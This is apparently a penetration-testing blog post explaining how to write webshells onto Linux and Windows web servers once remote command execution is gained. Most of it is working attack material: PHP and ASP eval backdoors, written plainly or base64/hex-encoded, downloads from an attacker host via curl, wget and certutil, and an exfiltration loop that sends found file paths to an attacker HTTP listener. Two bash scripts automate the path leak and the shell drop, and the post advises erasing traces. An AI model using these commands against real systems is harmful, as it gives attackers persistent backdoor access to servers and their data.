Summary of dropping files and putting them to use once command execution is obtained

0x01 Preface

How do we write a Webshell after obtaining command execution through an RCE (remote command execution) vulnerability or an MSSQL injection? Here we run tests against several scenarios that may be encountered in practice: Linux/Windows, with/without outbound Internet access, and with/without command echo (that is, whether the command's output is returned to us).

Generally, once we are sure we can execute commands, we choose to bring the host online in CS/MSF (Cobalt Strike/Metasploit) directly, but we also run into scenarios with no Internet access and no echo. In that case we may first need to find the absolute path of the target website and write a Webshell, and only then carry out information collection and intranet penetration.

Note: We can upload an arbitrary file through an upload function in the website's front end or back end, then use commands such as Windows `for` or Linux `find` to locate the file we just uploaded (or an existing file under the website) and obtain the absolute path, and finally write our file there. The rest of this article works through that.

0x02 Linux

(1) The target has outbound Internet access, and the command output is echoed

If the target host has outbound Internet access and command output is echoed, we can obtain the absolute path of the target website directly with the commands below, and then write or download the Webshell using any of the methods that follow.

Find absolute paths (locate relies on the updatedb index, so a file uploaded a moment ago may not be in it yet; the find variants read the filesystem directly):

locate 1653042293000.png 2>/dev/null
find / -name 1653042293000.png 2>/dev/null
find / 2>/dev/null | grep 1653042293000.png
find /var/www/html/ -name "*.php" | xargs grep -l "so-and-so website"

Write in the normal way:

echo '<?php eval($_POST[1]);?>' > /var/www/html/shell.php

Remote download write:

curl http://192.168.1.120/shell.txt > /var/www/html/shell.php
wget http://192.168.1.120/shell.txt -O /var/www/html/shell.php

(2) The target has outbound Internet access, but the command output is not echoed

If the target host has outbound Internet access but there is no echo when executing commands, we can use the "httplog" method: start an HTTP server on a machine we control and make the target request a URL that contains the path of the marker file, so the absolute path shows up in our server's access log. Then write the Webshell with the methods below; if the payload gets escaped or blocked by protection, try writing it in an encoded form. Note that `python -m SimpleHTTPServer` is Python 2; on Python 3 the equivalent is `python3 -m http.server 8888`.

Find absolute paths:

python -m SimpleHTTPServer 8888
find / -name 1653042293000.png 2>/dev/null | while read f; do curl "http://192.168.1.120:8888$f"; done
find / -name 1653042293000.png 2>/dev/null | while read f; do wget "http://192.168.1.120:8888$f"; done
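The following bash script is an added example and is not code from the original post. It builds the URL each found path should be requested at, percent-encoding the path so that spaces and special characters survive in the listener's log, and recovers the web root from a log line of the kind SimpleHTTPServer/http.server prints. The listener address 192.168.1.120:8888, the sample paths and the sample log line are constructed for the demo, so nothing here touches the network.

```bash
#!/bin/bash
# Added example (not from the original post): helpers for the "httplog" method.
# Requesting one URL per hit, with the path percent-encoded, works even when
# find returns several matches or a path contains spaces.
export LC_ALL=C   # byte-wise string handling for the encoder

# Percent-encode everything except unreserved characters and "/".
urlencode() {
    local s=$1 out='' c
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}          # first character of $s
        s=${s#?}
        case $c in
            [A-Za-z0-9/._~-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;   # "'x" yields the byte value
        esac
    done
    printf '%s' "$out"
}

# $1: listener host:port, $2: absolute path of a hit. The leading "/" is
# dropped so the request path does not start with "//".
exfil_url() {
    printf 'http://%s/%s' "$1" "$(urlencode "${2#/}")"
}

# Reverse of urlencode, used when reading the listener's log.
urldecode() {
    printf '%b' "$(printf '%s' "$1" | sed 's/%/\\x/g')"
}

# $1: one access-log line from the listener, e.g.
#   192.168.1.10 - - [15/Sep/2022 10:00:00] "GET /var/www/x.png HTTP/1.1" 404 -
# Prints the directory the marker file lives in, i.e. the web-root candidate.
web_root_from_log() {
    local req
    req=${1#*GET }             # drop everything up to the request path
    req=${req%% HTTP/*}        # drop the protocol version and status
    dirname "$(urldecode "$req")"
}

# --- demo with constructed data (no network access needed) ---
LISTENER=192.168.1.120:8888   # attacker box running: python -m SimpleHTTPServer 8888
for hit in '/var/www/my site/1653042293000.png' '/srv/app/static/1653042293000.png'; do
    exfil_url "$LISTENER" "$hit"; echo
done
# In the field, replace the constructed list above with:
#   find / -name 1653042293000.png 2>/dev/null | while IFS= read -r hit; do
#       curl -s -o /dev/null "$(exfil_url "$LISTENER" "$hit")"; done
SAMPLE_LOG='192.168.1.10 - - [15/Sep/2022 10:00:00] "GET /var/www/my%20site/1653042293000.png HTTP/1.1" 404 -'
web_root_from_log "$SAMPLE_LOG"; echo
```

The 404 in the log is expected: the listener does not need to serve anything, it only has to record the request line.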

Write in encoding:

echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > /var/www/html/shell.php
echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > /var/www/html/shell.php

(3) The target has no Internet access, and the command output is not echoed

If the target host cannot reach the Internet and there is no echo when executing commands, we can first locate the 1653042293000.png file and write the list of absolute paths into a file next to it, or write the Webshell straight into the directory that contains the file.

In practice it is best to first determine the absolute path of the target website and then write the Webshell in a separate step. Avoid using the second command directly: if a file with the same name exists elsewhere on the host, the Webshell is written next to every match found. Also remember to clean up the traces (path.txt, any stray shell.php) afterwards.

Find the absolute path to write to the web directory:

find / -name 1653042293000.png 2>/dev/null | while read f; do find / -name 1653042293000.png 2>/dev/null > "$(dirname "$f")/path.txt"; done

Find the absolute path to write to the Webshell:

find / -name 1653042293000.png 2>/dev/null | while read f; do echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ | base64 -d > "$(dirname "$f")/shell.php"; done
find / -name 1653042293000.png 2>/dev/null | while read f; do echo 3C3F706870206576616C28245F504F53545B315D293B3F3E | xxd -r -ps > "$(dirname "$f")/shell.php"; done
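The following bash script is an added example, not code from the original post. It implements the procedure above in one piece: search for the marker, leave path.txt beside every hit, and write the base64-decoded Webshell only beside the single hit that sits under a web-root-looking directory, which is exactly the guard needed when a file with the same name exists elsewhere on the host. The web-root patterns, the temporary directory layout and the stray second copy of the marker are constructed for the demo; in the field the search root would be /.

```bash
#!/bin/bash
# Added example (not from the original post): the "no Internet, no echo" case.
# path.txt goes beside every hit (the post's first loop); shell.php goes only
# beside the one hit under a web root, so a stray copy of the marker elsewhere
# on the disk never gets a shell dropped next to it.
MARKER=1653042293000.png
PAYLOAD_B64='PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'   # <?php eval($_POST[1]);?>, as in the post

# Every copy of the marker under $1, one path per line, errors suppressed.
find_marker() {
    find "$1" -name "$MARKER" -type f 2>/dev/null || true
}

# Keep only hits under a directory that looks like a web root.
# The pattern list is an assumption; extend it for the target's stack.
filter_web_hits() {
    grep -E '/(var/www|html|htdocs|wwwroot|public_html|webapps)/' || true
}

# $1: search root (/ in the field). Prints the shell's path and returns 0 when
# exactly one web-root hit exists, 1 when the web-root hit set is empty or
# ambiguous, 2 when the marker was not found at all.
drop_shell() {
    local hits webhits n dir
    hits=$(find_marker "$1")
    [ -n "$hits" ] || return 2
    printf '%s\n' "$hits" | while IFS= read -r f; do
        printf '%s\n' "$hits" > "$(dirname "$f")/path.txt"
    done
    webhits=$(printf '%s\n' "$hits" | filter_web_hits)
    n=$(printf '%s\n' "$webhits" | grep -c . || true)
    [ "$n" -eq 1 ] || return 1
    dir=$(dirname "$webhits")
    printf '%s' "$PAYLOAD_B64" | base64 -d > "$dir/shell.php"
    printf '%s\n' "$dir/shell.php"
}

# --- constructed demo layout standing in for the target's filesystem ---
DEMO=$(mktemp -d)
trap 'rm -rf "$DEMO"' EXIT
mkdir -p "$DEMO/var/www/html/uploads" "$DEMO/home/dev/backup"
: > "$DEMO/var/www/html/uploads/$MARKER"
: > "$DEMO/home/dev/backup/$MARKER"      # stray copy: same name, not a web root
SHELL_PATH=$(drop_shell "$DEMO")
printf 'shell written to %s\n' "$SHELL_PATH"
printf 'path.txt beside the stray copy lists:\n'
cat "$DEMO/home/dev/backup/path.txt"
```

When drop_shell returns 1, read the path.txt files it left behind (or exfiltrate them once you have a channel) and pick the web root by hand before writing anything; the return code is the blind-case substitute for echo.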

0x03 Windows

(1) The target has outbound Internet access, and the command output is echoed

If the target host has outbound Internet access and command output is echoed, we can obtain the absolute path of the target website with commands such as dir, where, for and findstr, or by reading the IIS configuration (appcmd, or applicationHost.config under %windir%\system32\inetsrv\config), and then write or download the Webshell in any of the following ways.

Find absolute paths:

dir /a/b/s C:\1653042293000.png
where /r C:\ 1653042293000.png
for /r "C:\" %i in (1653042293000.png*) do @echo %i
findstr /n /s /i "so-and-so website" C:\*.asp
%windir%\system32\inetsrv\appcmd list VDIR

Write in the normal way (`set /p ... <nul` writes the line without a trailing newline while `echo` appends one; `^` escapes `<` and `>` so cmd does not treat them as redirections):

set /p="<%execute request("1")%>" <nul >> C:\inetpub\wwwroot\shell.asp
echo ^<%execute request("1")%^> > C:\inetpub\wwwroot\shell.asp
certutil -urlcache -split -f http://192.168.1.105:8080/shell.txt C:\inetpub\wwwroot\shell.asp

(2) The target has outbound Internet access, but the command output is not echoed

If the target host has outbound Internet access but there is no echo when executing commands, we can loop over the C drive with `for /r` looking for the 1653042293000.png file; each match lands in the %i variable, and we can then either hand it to certutil so the absolute path shows up in our HTTP server's log ("httplog"), or write the Webshell straight into the file's directory. If escaping or protection gets in the way, try writing in an encoded form; the intermediate shell.txt must be cleaned up afterwards.

Find absolute paths:

python -m SimpleHTTPServer 8888
for /r C:\ %i in (1653042293000.png*) do certutil -urlcache -split -f http://192.168.1.120:8888/%i

Write in the normal way:

for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp

Write in encoding:

for /r C:\ %i in (1653042293000.png*) do echo PCVleGVjdXRlIHJlcXVlc3QoIjEiKSU+ > %i/../shell.txt & certutil -decode %i/../shell.txt %i/../shell.asp
for /r C:\ %i in (1653042293000.png*) do echo 3C256578656375746520726571756573742822312229253E > %i/../shell.txt & certutil -decodehex %i/../shell.txt %i/../shell.asp

(3) The target has no Internet access, and the command output is not echoed

If the target host cannot reach the Internet and there is no echo when executing commands, we can run the commands below to record the absolute path of the 1653042293000.png file next to it, or write the Webshell into the same directory as the file; if escaping or protection gets in the way, try the encoded write.

Although the commands look similar, the `for /r` form is more efficient: it writes as soon as each file is encountered during the traversal, whereas the `for /f` form over `dir /s /b` has to wait for the whole dir run to finish before its loop starts, so I personally recommend the first. Either way, remember to clean up the files left next to any same-named matches elsewhere on the disk.

Find the absolute path to write to the web directory:

for /r C:\ %i in (1653042293000.png*) do echo %i> %i\..\path.txt
for /f "delims=" %i in ('dir /s /b C:\1653042293000.png') do echo %i> %i\..\path.txt
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c dir /a/b/s C:\1653042293000.png > path.txt"

Find the absolute path and write the Webshell (the `for /f` form needs "delims=" so paths containing spaces are not split; inside the forfiles /C string the double quotes around "1" would end the argument early, so the ASP payload uses chr(49) to produce the "1" instead):

for /r C:\ %i in (1653042293000.png*) do echo ^<%execute request("1")%^> > %i/../shell.asp
for /f "delims=" %i in ('dir /s /b C:\1653042293000.png') do echo ^<%execute request("1")%^> > %i/../shell.asp
forfiles /P C:\ /S /M 1653042293000.png /C "cmd /c echo ^<%execute request(chr(49))%^> > shell.asp"

Conclusion:

In this article I divided the ways of finding the absolute path into three: command search (with echo), exfiltration through an HTTP log (without echo), and writing next to a known file in the web directory (without Internet access); and the ways of writing the file into three: plain write, encoded write, and remote download. Linux and Windows follow the same approach with different commands: locate the web root by file name or file content, then use an ordinary file write or download to get a shell.

Posted by daydreamer on Thu, 15 Sep 2022 01:59:19 +0930